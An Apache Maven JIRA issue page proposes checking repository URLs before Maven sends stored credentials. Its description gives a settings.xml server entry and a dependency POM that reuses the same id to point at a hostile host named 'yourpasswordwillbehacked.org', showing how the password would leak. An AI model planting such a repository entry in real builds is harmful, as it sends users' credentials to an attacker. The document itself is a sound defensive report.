[MNG-5265] enforce repository url verification for passing authz - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Improvement
Status: Closed
Priority: Major
Resolution: Auto Closed
Affects Version/s: 2.0.10, 2.2.1, 3.0.2, 3.0.3, 3.0.4
Fix Version/s: None
Component/s: Settings
Labels:
None

Description

Related discussion: http://markmail.org/message/7pswshucxc7qwtef

in your settings you have:

    <server>
      <username>olamy</username>
      <password>reallycomplicatedpassword</password>
      <id>foo.org</id>
    </server>

During dependencies resolution, you get a pom with a repository.

    <repository>
      <id>foo.org</id>
      <url>http://yourpasswordwillbehacked.org/</url>
    </repository>

Idea id in settings must contains the target hostname.

Attachments

Activity

People

Assignee:: Unassigned

Reporter:: Olivier Lamy

Votes:: 0 Vote for this issue

Watchers:: 3 Start watching this issue

Dates

Created:: 20/Mar/12 18:47

Updated:: 16/Mar/18 22:37

Resolved:: 16/Mar/18 22:37